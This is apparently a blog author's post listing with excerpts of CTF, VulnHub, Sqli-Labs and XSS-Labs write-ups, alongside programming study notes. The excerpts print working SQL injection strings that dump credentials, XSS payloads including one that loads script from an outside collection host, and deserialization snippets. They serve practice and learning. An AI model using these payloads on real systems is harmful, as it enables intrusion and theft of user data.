笔记
N1etzsche
这个作者很懒,什么都没留下…
展开
-
CTF做题笔记13
CISCN2019 华北赛区 Day1 Web1 Dropbox<!--phar--><?phpclass User { public $db;}class File{ public $filename;}class FileList{ private $files; public function __construct($path) { $file = new File(); $file->原创 2022-05-01 22:34:54 · 308 阅读 · 0 评论 -
Thales
$ sudo nmap -sP 192.168.0.1/24 Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-20 13:46 CSTNmap scan report for 192.168.0.1Host is up (0.00041s latency).MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)Nmap scan report原创 2022-04-20 17:58:41 · 1449 阅读 · 0 评论 -
Python学习笔记——多线程
import _threadfrom time import sleep, ctimeloops = [4, 2]def loop(nloop, nsec, lock): print('start loop', nloop, 'at:', ctime()) sleep(nsec) print('loop', nloop, 'done at:', ctime()) lock.release()def main(): print('starting a原创 2022-04-20 12:46:29 · 784 阅读 · 0 评论 -
CTF做题笔记12
[GYCTF2020]Blacklist?inject=1%27error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1?inject=1%27;show%20tables;#array(2) { [0]=>原创 2022-04-12 19:31:37 · 460 阅读 · 0 评论 -
CTF做题笔记11
[HCTF 2018]adminimport sysimport zlibfrom flask.sessions import session_json_serializerfrom itsdangerous import base64_decodedef decryption(payload): payload, sig = payload.rsplit(b'.', 1) payload, timestamp = payload.rsplit(b'.', 1) d原创 2022-04-07 16:07:31 · 476 阅读 · 0 评论 -
Empire-Lupin-One
$ sudo nmap -sP 192.168.0.1/24Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-06 20:21 CSTNmap scan report for 192.168.0.1Host is up (0.00036s latency).MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)Nmap scan report fo原创 2022-04-06 22:06:53 · 6824 阅读 · 0 评论 -
Deathnote
$ sudo nmap -sP 192.168.0.1/24 Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-05 14:35 CSTNmap scan report for 192.168.0.1Host is up (0.00050s latency).MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)Nmap scan report f原创 2022-04-05 16:30:19 · 616 阅读 · 0 评论 -
CTF做题笔记10
[ZJCTF 2019]NiZhuanSiWei?text=data://text/pain,welcome%20to%20the%20zjctf&file=php://filter/read=convert.base64-encode/resource=useless.phpwelcome to the zjctfPD9waHAgIAoKY2xhc3MgRmxhZ3sgIC8vZmxhZy5waHAgIAogICAgcHVibGljICRmaWxlOyAgCiAgICBwdWJsaWM原创 2022-04-04 22:38:43 · 351 阅读 · 0 评论 -
Empire: Breakout
$ sudo nmap -sP 192.168.0.1/24Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-02 16:54 CSTNmap scan report for 192.168.0.1Host is up (0.00054s latency).MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)Nmap scan report fo原创 2022-04-04 13:16:17 · 586 阅读 · 0 评论 -
CTF做题笔记9
[ACTF2020 新生赛]BackupFile$ python3 dirsearch.py -e php,txt,zip,html -u http://d71ec916-0f16-4fea-b5ae-f1d1251aae5e.node4.buuoj.cn:81/ -t 40 --exclude-status 403,401[19:57:33] 200 - 347B - /index.php.bak?index.php?key=123[极客大挑战 2019]PHP/www.zip&原创 2022-03-29 17:22:19 · 3551 阅读 · 0 评论 -
Earth
$ sudo nmap -sP 192.168.0.1/24Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-27 02:19 CSTNmap scan report for 192.168.0.1Host is up (0.00047s latency).MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)Nmap scan report fo原创 2022-03-28 23:05:33 · 940 阅读 · 0 评论 -
CTF做题笔记8
[2022DASCTF]ezpop<?phpclass crow{ public $v1; public $v2; function eval() { echo new $this->v1($this->v2); } public function __invoke() { $this->v1->world(); }}class fin{ public $f1;原创 2022-03-27 14:15:51 · 767 阅读 · 0 评论 -
Napping
$ sudo nmap -sP 192.168.0.1/24Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-26 19:25 CSTNmap scan report for 192.168.0.1Host is up (0.00040s latency).MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)Nmap scan report fo原创 2022-03-26 20:36:28 · 705 阅读 · 0 评论 -
CTF做题笔记7
[护网杯 2018]easy_tornadohttp://73fdf6fb-85e6-41f4-a577-50bc91dd23c1.node4.buuoj.cn:81/error?msg={{22}}<html><head><style>body{font-size: 30px;}</style></head><body>22</body></html>http://73fdf6fb-85e6原创 2022-03-25 14:23:22 · 1230 阅读 · 0 评论 -
VulnHub—Red
$ sudo nmap -sP 192.168.0.1/24Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-22 02:44 CSTNmap scan report for 192.168.0.1Host is up (0.00045s latency).MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)Nmap scan report fo原创 2022-03-23 10:58:13 · 6336 阅读 · 0 评论 -
Web-Machine-N7
$ sudo nmap -sP 192.168.0.1/24 Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-21 04:31 CSTNmap scan report for 192.168.0.1Host is up (0.00048s latency).MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)Nmap scan report原创 2022-03-20 22:16:38 · 1946 阅读 · 1 评论 -
Os-ByteSec
$ sudo nmap -sP 192.168.0.1/24Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-18 06:31 CSTNmap scan report for 192.168.0.1Host is up (0.00044s latency).MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)Nmap scan report fo原创 2022-03-18 22:05:59 · 4934 阅读 · 0 评论 -
C++ 学习笔记
Less-1:#include <iostream>using namespace std;int main(){ cout << "Hello World"; return 0;}Less-2 :#include<iostream>#include<limits>using namespace std;extern int a, b;extern int c;extern float f;int main(i原创 2022-03-16 12:36:55 · 808 阅读 · 0 评论 -
Python脚本——MD5碰撞和HTML转义
import hashlibfor i in range(1,100000000000): s = hashlib.md5(str(i).encode("utf-8")).hexdigest()[0:6] if s == "184b43": print(i) breakin_str = "(function(){window.location.href='http://xss.buuoj.cn/index.php?do=api&id=3MGcX原创 2022-02-22 14:01:58 · 792 阅读 · 0 评论 -
CTF做题笔记6
BUU XSS COURSE 1:</textarea>'"><img src=# id=xssyou style=display:none onerror=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22http%3A%2F%2Fxss.buuoj.cn%2F3MGcXr%22%3B%28document.getElementsByTagName%28%22HEAD%22原创 2022-02-20 18:47:39 · 5098 阅读 · 0 评论 -
[第二章 web进阶]XSS闯关
Less-1:<script>alert('xss')</script>Less-2:';alert(1);'Less-3:'';alert(1);//Less-4:jumpUrl=javascript:alert('xss')Less-5:?autosubmit=1&action=javascript:alert(1)Less-6:{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} }原创 2022-02-20 13:27:44 · 572 阅读 · 0 评论 -
Xss-Labs做题笔记:Less-1 - Less-18
Leve-1:<script>alert('xss')</script>Leve-2:"><script>alert('xss')</script> //Leve-3:'οnfοcus=javascript:alert('xss') > // Leve-4:"οnfοcus=javascript:alert('xss') "Leve-5"><a href=javascript:alert('xss')>x原创 2022-02-14 19:04:48 · 221 阅读 · 0 评论 -
Xss-Labs做题笔记:Less-1 - Less-9
Leve-1:<script>alert('xss')</script>Leve-2:"><script>alert('xss')</script> //Leve-3:'οnfοcus=javascript:alert('xss') > //Leve-4:"οnfοcus=javascript:alert('xss') "Leve-5"><a href=javascript:alert('xss')>xs原创 2022-02-14 12:40:38 · 299 阅读 · 0 评论 -
CTF做题笔记5
xctf-supersqli:?inject=-1';show databases;--+?inject=-1';show tables;--+?inject=-1';show columns from `1919810931114514`;--+?inject=-1';set @a= concat('sel','ect * from `1919810931114514`');prEpare stmt from @a;EXECUTE stmt;--+xctf-NewsCenter:1' uni原创 2022-01-27 15:22:17 · 3375 阅读 · 0 评论 -
Sqli-Labs做题笔记:Less-1 - Less-65
sqli-labs 学习笔记SQL注入分类:可回显的注入:可以联合查询的注入报错注入通过注入进行DNS请求,从而达到回显的目的不可回显的注入:Bool盲注时间盲注二次注入万能语句:1 or 1=1 – #1’ or 1=1 – #1" or 1=1 – #1) or 1=1 – #1’) or 1=1 – #1") or 1=1 – #1)) or 1=1 – #1’) or 1=1-- #1") or 1=1-- #判断闭合:uname=1&原创 2022-01-26 17:07:15 · 178 阅读 · 0 评论 -
Sqli-Labs做题笔记:Less-46 - Less-53
ORDER BY 注入Less-46:localhost/sqlilabs/Less-46/?sort=1 and (updatexml(1,concat(0x5e24,(substr((select+group_concat(username,0x7e,password)+from+security.users),1)),0x7e),1))http://localhost/sqlilabs/Less-46/?sort=rand(ascii(mid((select%20group_concat(us原创 2022-01-26 11:40:46 · 2123 阅读 · 0 评论 -
Python学习笔记——顺序结构
乘法表:for i in range(1, 10): for j in range(1, i+1): print('{}*{}={}\t'.format(j, i, j*i), end='') print()判断素数:from numpy import appendnum = []i = 2for i in range(1, 300): for j in range(2, i): if(i % j == 0): b原创 2022-01-26 10:22:08 · 820 阅读 · 0 评论 -
Sqli-Labs做题笔记:Less-32 - Less-38
宽字节注入:Less-32:http://localhost/sqlilabs/Less-32/?id=-1%df%27%20union%20select%201,(select%0Agroup_concat(username)%0Afrom%0Asecurity.users),(select%0Agroup_concat(password)%0Afrom%0Asecurity.users);%00Less-33:http://localhost/sqlilabs/Less-33/?id=-1%d原创 2022-01-25 16:01:32 · 1018 阅读 · 0 评论 -
Sqli-Labs做题笔记:Less-21 - Less-26a
绕过:过滤关键字穿插关键字绕过:select selselctector oorrunion ununionion大小写转换:select SelECtor Orunion uNIon十六进制转换:select selec\x74or o\x72union unio\x6e双重URL编码:select %25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34原创 2022-01-23 23:50:14 · 562 阅读 · 0 评论 -
Sqli-Labs做题笔记:Less-11 - Less-20
SQL注入分类:可回显的注入:可以联合查询的注入报错注入通过注入进行DNS请求,从而达到回显的目的不可回显的注入:Bool盲注时间盲注二次注入万能语句:1 or 1=1 – #1’ or 1=1 – #1" or 1=1 – #1) or 1=1 – #1’) or 1=1 – #1") or 1=1 – #1)) or 1=1 – #1’) or 1=1-- #1") or 1=1-- #判断闭合:uname=1&passwd=1 or原创 2022-01-22 14:56:12 · 635 阅读 · 0 评论 -
Bool盲注脚本
import requestschars = "qwertyuiopasdfghjklzxcvbnm0123456789}{"url = "http://localhost/sqli-labs-kali2-master/Less-15/"for x in range(0, 10): table_name = "" for y in range(1, 20): for char in chars: payload = {原创 2022-01-21 22:16:45 · 661 阅读 · 0 评论 -
Sqli-Labs做题笔记:Less-1 - Less-10
sqli-labsLess-1:http://localhost/sqli-labs-kali2-master/Less-1/?id=-1%27+union+select+1,group_concat(username),group_concat(password)+from+security.users+--+Less-2:http://localhost/sqli-labs-kali2-master/Less-2/?id=-1+union+select+1,group_concat(usern原创 2022-01-19 16:01:55 · 580 阅读 · 0 评论 -
PHP学习笔记——查找数组示例
<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Jo原创 2022-01-19 13:22:57 · 252 阅读 · 0 评论 -
PHP学习笔记——数组
<?php $person['age'] = 0; if ($person['age']) { echo "true!\n"; } if (array_key_exists('age', $person)) { echo "exists!\n"; } // exists! $subjects = array("physics", "chem", "math", "bio", "cs", "drama", "cla.原创 2022-01-18 11:47:35 · 215 阅读 · 0 评论 -
PHP学习笔记——正则表达式
<?php $message = <<< END To: you@youcorp From: me@mecorp Subject: pay up Pay me or else! END; preg_match("/^subject:(.*)/im",$message,$match); print_r($match); echo "<br />"; ?> <?php...原创 2022-01-16 14:42:21 · 176 阅读 · 0 评论 -
PHP学习笔记——参数计数
<!-- 参数计数 --><!DOCTYPE html><html lang="en" dir="ltr"> <head> <meta charset="utf-8"> <title></title> </head> <body> <?php function countlist() { if(func_num_ar原创 2022-01-15 10:33:14 · 80 阅读 · 0 评论 -
PHP学习笔记——PHP介绍
```php<!DOCTYPE html><html lang="en" dir="ltr"> <head> <meta charset="utf-8"> <title>This is my first PHP program!</title> </head> <body> <p> Look,ma!It's my first PHP program:原创 2022-01-15 10:29:36 · 87 阅读 · 0 评论 -
PHP学习笔记——数组
<?php // 在此之前的$addresses没有定义 echo $addresses[0]; // 无输出 echo $addresses; // 无输出 $addresses[0] = "100@100.com"; $addresses[1] = "111@111.com"; $addresses[2] = "222@222.com"; echo $addresses; $addresses = array("100@100.co.原创 2022-01-15 10:21:30 · 198 阅读 · 0 评论 -
PHP学习笔记——字符串
<!DOCTYPE html><html lang="en" dir="ltr"> <head> <meta charset="utf-8"> <title>joker</title> </head> <body> <?php $greeting = "good morning citizen"; $farewell = substr_replace($greeti原创 2022-01-14 11:08:30 · 101 阅读 · 0 评论 -
从HTML中提取URL
<!DOCTYPE html><html lang="en" dir="ltr"> <head> <meta charset="utf-8"> <title>joker</title> </head> <body> <?php if(getenv('REQUST_METHOD')=='POST'){ $url = $_POST['url'];原创 2022-01-13 15:13:34 · 1758 阅读 · 0 评论